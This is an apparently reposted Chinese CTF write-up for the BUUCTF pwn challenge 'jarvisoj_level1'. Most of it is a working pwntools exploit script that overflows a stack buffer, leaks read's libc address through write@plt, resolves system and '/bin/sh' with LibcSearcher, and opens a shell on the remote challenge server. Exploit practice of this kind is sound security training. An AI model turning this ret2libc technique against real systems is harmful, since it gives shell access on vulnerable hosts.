ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

[BUUCTF-pwn]——jarvisoj_level1

2021-03-17 10:02:24  阅读:514  来源: 互联网

标签:BUUCTF addr level1 libc elf p32 jarvisoj read pwn


[BUUCTF-pwn]——jarvisoj_level1

第一种直接构造shellcode
writeup

第二种泄露libc进行操作

from pwn import *
from LibcSearcher import *
p = remote("node3.buuoj.cn",26361)
#p = process("./level1")
elf = ELF("./level1")
#libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
write_got = elf.got['write']
write_plt = elf.plt['write']
read_got = elf.got['read']
main = elf.symbols['main']
#gdb.attach(p)

payload = 'a' * (0x88 + 4) + p32(write_plt) + p32(main) + p32(1) + p32(read_got) + p32(4)
p.send(payload)
read_addr = u32(p.recv(4))
log.success("read_addr ---->:" + hex(read_addr))
libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')

info("libc_base -----> " + hex(libc_base))
sys = libc_base +libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
payload = 'a' * (0x88 + 4) + p32(sys) + p32(main) + p32(binsh) 
p.send(payload)
p.interactive()


标签:BUUCTF,addr,level1,libc,elf,p32,jarvisoj,read,pwn
来源: https://blog.csdn.net/Y_peak/article/details/114916604

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有